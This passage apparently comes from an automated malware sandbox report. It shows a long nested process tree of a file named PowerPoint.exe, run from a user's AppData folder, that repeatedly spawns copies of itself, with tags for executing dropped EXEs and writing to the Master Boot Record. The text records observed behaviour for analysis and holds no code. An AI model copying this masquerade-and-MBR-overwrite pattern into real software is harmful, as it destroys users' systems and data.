C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:1332
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:28108 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:6000
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:35772
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:25716
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:30904
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:8924
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:30296
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:6240
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:14916
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:6168
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵
- Executes dropped EXE
PID:7964 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21024
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:13104
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:14480
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:39384
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:27204
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21436
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:13340
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:6112
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:27376 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:12872
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:5740
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:15208
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:6900
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:28352
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:32684
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:11176
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:24800
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:30056 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:8956
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:16300
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:30432
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:15300
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:14416
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵
- Writes to the Master Boot Record (MBR)
PID:9396 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21100
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:8484
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21484
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:12848
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:2400
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:14876
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:6724
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:27848 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:13416
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:10932
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:15608
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:29384
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:25912
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:39636
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:11296
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:20336
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:10840
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:1968
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:21264
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:31404
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:20352
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:20200
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:21660
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:22640
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:27580
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:17132
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:6880
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:35588
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:8732
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:37912
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:22048
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:13088
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:23488
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:5984
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:5908 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵
- Executes dropped EXE
PID:1636 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:10376
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21040
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:6344
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21432
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:16016
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:440
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:20220
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21800
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:30272
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:9916
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:4528
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:27608
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:2600
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:12632
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:14512
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:28492
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:5328
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:35912
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:20564
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:31064
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:5232
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:12940
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:12624
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:14892
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:2152
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:20656
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:39828
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:10816
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:476
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:21392 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:13464
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:26032
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:39664
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21760
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:13836
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:2244
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:27784
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:8792
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:35956 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:5504
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:35740 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:26468
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:15788
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:8560
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:15168
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:948
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵
- Executes dropped EXE
PID:7084 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:10552 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵
- Writes to the Master Boot Record (MBR)
PID:30260 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:12600
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:9784
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:564
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:15072
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:6732
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:20608
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:13512
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:25680
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:20356
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21356
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:26216
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21712
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:8688
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:28324
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:15484
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:11852
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:5476
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:35980 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:7948
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:38008
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:12524
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:16176
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:25764
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:14900
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:10632
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:7868
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:11012
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:17500
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:7564
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21312
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:37196
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:11912
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:14824
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:7400
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21644
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:16092
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:20568
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:5372
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:27944
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:13724
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:6584
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:29264
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:26040
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:1280
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:12212
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:14388
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:9000
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:11148 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:29592
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:11008
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:14440
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:21332 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:39812
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:25068
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:20100
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21692
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:13708
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:6884
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:28320
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:8852
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:30044
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:20524
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:1460
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:12376
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:15268
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:2992
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:7708
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21048
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:6856
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:12056
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:19968
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:12120
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21468
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:32616
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:8240
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:20028
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:27708
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:8452
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:28580
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:6816
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:10700
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:20196
-
-
-
